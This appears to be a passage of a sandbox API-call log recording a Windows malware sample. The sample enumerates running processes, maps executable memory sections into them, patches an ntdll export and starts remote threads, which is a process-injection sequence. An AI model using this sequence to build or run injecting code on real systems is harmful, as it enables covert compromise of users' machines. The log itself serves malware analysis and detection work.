0x7485436b [0173.130] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0173.130] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0173.130] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0173.130] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0173.130] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0173.130] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0173.130] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0173.131] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0173.131] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0173.131] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0173.131] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0173.131] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0173.131] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0070000) returned 0x881f0 [0173.131] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0173.132] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0173.132] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0173.132] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0173.132] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0173.132] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0173.132] GetLastError () returned 0x0 [0173.132] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0173.133] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0173.133] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0173.133] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0173.133] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0173.135] CloseHandle (hObject=0xfc) returned 1 [0173.135] Sleep (dwMilliseconds=0x1f4) [0173.663] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0173.664] CloseHandle (hObject=0xf8) returned 1 [0173.664] CloseHandle (hObject=0xf4) returned 1 [0173.664] CloseHandle (hObject=0xf0) returned 1 [0173.664] CloseHandle (hObject=0xec) returned 1 [0173.665] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0173.665] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0173.665] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0173.665] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0173.665] CloseHandle (hObject=0xec) returned 1 [0173.665] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0173.665] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0173.665] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0173.665] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.665] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0173.665] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.665] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0173.665] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0173.665] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0173.666] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x200000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0173.670] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0173.670] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x210000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0173.670] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0173.671] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0173.671] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0173.671] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0173.671] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0173.671] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0173.671] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0173.671] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0173.671] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0173.672] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0173.672] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0173.672] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0173.672] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0173.672] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0173.672] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0173.672] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0173.672] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0173.672] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0173.672] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0173.673] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0173.673] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0173.673] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0173.673] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0200000) returned 0x881f0 [0173.673] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0173.674] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0173.674] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0173.674] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0173.674] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0173.677] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0173.677] GetLastError () returned 0x0 [0173.677] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0173.677] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0173.677] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0173.677] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0173.678] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0173.679] CloseHandle (hObject=0xfc) returned 1 [0173.679] Sleep (dwMilliseconds=0x1f4) [0174.240] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0174.241] CloseHandle (hObject=0xf8) returned 1 [0174.241] CloseHandle (hObject=0xf4) returned 1 [0174.241] CloseHandle (hObject=0xf0) returned 1 [0174.241] CloseHandle (hObject=0xec) returned 1 [0174.241] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0174.242] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0174.242] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0174.242] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0174.242] CloseHandle (hObject=0xec) returned 1 [0174.242] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0174.242] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0174.242] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0174.242] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.242] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0174.242] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.242] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0174.242] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.242] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0174.242] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xe0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0174.246] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0174.247] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xf0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0174.247] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0174.247] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0174.247] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0174.247] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0174.247] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0174.247] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0174.247] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0174.248] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0174.248] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0174.248] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0174.248] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0174.248] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0174.248] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0174.248] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0174.248] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0174.248] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0174.248] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0174.249] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0174.249] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0174.249] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0174.249] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0174.249] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0174.249] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf00e0000) returned 0x881f0 [0174.249] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0174.250] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0174.250] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0174.250] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0174.250] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0174.250] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0174.250] GetLastError () returned 0x0 [0174.251] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0174.251] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0174.251] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0174.251] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0174.252] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0174.253] CloseHandle (hObject=0xfc) returned 1 [0174.253] Sleep (dwMilliseconds=0x1f4) [0174.911] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0174.912] CloseHandle (hObject=0xf8) returned 1 [0174.912] CloseHandle (hObject=0xf4) returned 1 [0174.912] CloseHandle (hObject=0xf0) returned 1 [0174.912] CloseHandle (hObject=0xec) returned 1 [0174.912] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0174.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0174.913] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0174.913] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0174.913] CloseHandle (hObject=0xec) returned 1 [0174.913] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0174.913] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0174.913] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0174.913] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf74c, dwLength=0x1c | out: lpBuffer=0x2cf74c*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.913] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0174.913] VirtualQuery (in: lpAddress=0x3a3fe8, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a3000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0x10000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.913] OpenProcess (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0174.913] VirtualQuery (in: lpAddress=0x3a4358, lpBuffer=0x2cf6f4, dwLength=0x1c | out: lpBuffer=0x2cf6f4*(BaseAddress=0x3a4000, AllocationBase=0x380000, AllocationProtect=0x4, RegionSize=0xf000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0174.913] NtCreateSection (in: SectionHandle=0x2cf738, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf738*=0xf0) returned 0x0 [0174.913] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x90000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0174.918] NtCreateSection (in: SectionHandle=0x2cf734, DesiredAccess=0xf001f, ObjectAttributes=0x0, MaximumSize=0x2cf6f8, SectionPageProtection=0x40, AllocationAttributes=0x8000000, FileHandle=0x0 | out: SectionHandle=0x2cf734*=0xf4) returned 0x0 [0174.918] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xec, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0xa0000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0174.918] NtMapViewOfSection (in: SectionHandle=0xf0, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x9000) returned 0x0 [0174.918] RtlMoveMemory (in: Destination=0x81000, Source=0x3a4758, Length=0x0 | out: Destination=0x81000) [0174.918] RtlMoveMemory (in: Destination=0x86000, Source=0x3a4758, Length=0x1a00 | out: Destination=0x86000) [0174.918] RtlMoveMemory (in: Destination=0x88000, Source=0x3a6158, Length=0x200 | out: Destination=0x88000) [0174.918] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0174.919] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0174.919] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0174.919] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0174.919] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0174.919] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0174.919] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0174.919] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0174.919] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0174.919] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0174.919] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0174.919] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0174.920] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0174.920] GetProcAddress (hModule=0x74f40000, lpProcName="wsprintfW") returned 0x74f7e061 [0174.920] LoadLibraryA (lpLibFileName="WINHTTP.dll") returned 0x747f0000 [0174.920] GetProcAddress (hModule=0x747f0000, lpProcName="WinHttpOpen") returned 0x747f58b9 [0174.920] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x75bc0000 [0174.920] GetProcAddress (hModule=0x75bc0000, lpProcName=0xf) returned 0x75bc2d8b [0174.920] LdrProcessRelocationBlock (Address=0x87000, Count=0x2, TypeOffset=0x881ec, Delta=0xf0090000) returned 0x881f0 [0174.920] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80000) returned 0x0 [0174.921] NtMapViewOfSection (in: SectionHandle=0xf4, ProcessHandle=0xffffffff, BaseAddress=0x2cf704*=0x0, ZeroBits=0x0, CommitSize=0x0, SectionOffset=0x0, ViewSize=0x2cf700*=0x0, InheritDisposition=0x1, AllocationType=0x0, AccessProtection=0x40 | out: BaseAddress=0x2cf704*=0x80000, SectionOffset=0x0, ViewSize=0x2cf700*=0x1000) returned 0x0 [0174.922] RtlMoveMemory (in: Destination=0x80000, Source=0x73348, Length=0x16 | out: Destination=0x80000) [0174.922] RtlMoveMemory (in: Destination=0x80016, Source=0x3a3fe8, Length=0x363 | out: Destination=0x80016) [0174.922] NtUnmapViewOfSection (ProcessHandle=0xffffffff, BaseAddress=0x80016) returned 0x0 [0174.922] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="opera_shared_counter") returned 0xf8 [0174.922] GetLastError () returned 0x0 [0174.922] GetModuleHandleA (lpModuleName="ntdll") returned 0x77130000 [0174.923] GetProcAddress (hModule=0x77130000, lpProcName="atan") returned 0x771abee0 [0174.923] ReadProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750, nSize=0x5, lpNumberOfBytesRead=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesRead=0x2cf72c*=0x5) returned 1 [0174.923] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf748*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf748*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0174.924] CreateRemoteThread (in: hProcess=0xec, lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x771abee0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xfc [0174.925] CloseHandle (hObject=0xfc) returned 1 [0174.925] Sleep (dwMilliseconds=0x1f4) [0175.477] WriteProcessMemory (in: hProcess=0xec, lpBaseAddress=0x771abee0, lpBuffer=0x2cf750*, nSize=0x5, lpNumberOfBytesWritten=0x2cf72c | out: lpBuffer=0x2cf750*, lpNumberOfBytesWritten=0x2cf72c*=0x5) returned 1 [0175.479] CloseHandle (hObject=0xf8) returned 1 [0175.479] CloseHandle (hObject=0xf4) returned 1 [0175.479] CloseHandle (hObject=0xf0) returned 1 [0175.479] CloseHandle (hObject=0xec) returned 1 [0175.479] Process32Next (in: hSnapshot=0xe8, 